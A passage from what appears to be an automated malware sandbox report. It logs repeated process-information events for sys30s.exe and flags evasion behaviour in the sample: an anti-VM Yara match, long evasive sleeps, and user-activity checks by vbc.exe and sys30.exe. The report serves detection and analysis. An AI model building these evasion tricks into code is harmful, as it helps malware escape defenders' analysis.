Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1944	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2804	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2280	Thread sleep count: 193 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1944	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2540	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2688	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2904	Thread sleep count: 8354 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2904	Thread sleep count: 1010 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2608	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2608	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2816	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2604	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2572	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1712	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2120	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1704	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1408	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2060	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1312	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2668	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1016	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 3008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 832	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2928	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 604	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2188	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2792	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2072	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1304	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1712	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1452	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1612	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2224	Thread sleep time: -60000s >= -30000s

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Window / User API: threadDelayed 8354	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Window / User API: threadDelayed 1010	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Window / User API: threadDelayed 7559
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Window / User API: threadDelayed 1957
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Window / User API: foregroundWindowGot 386

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
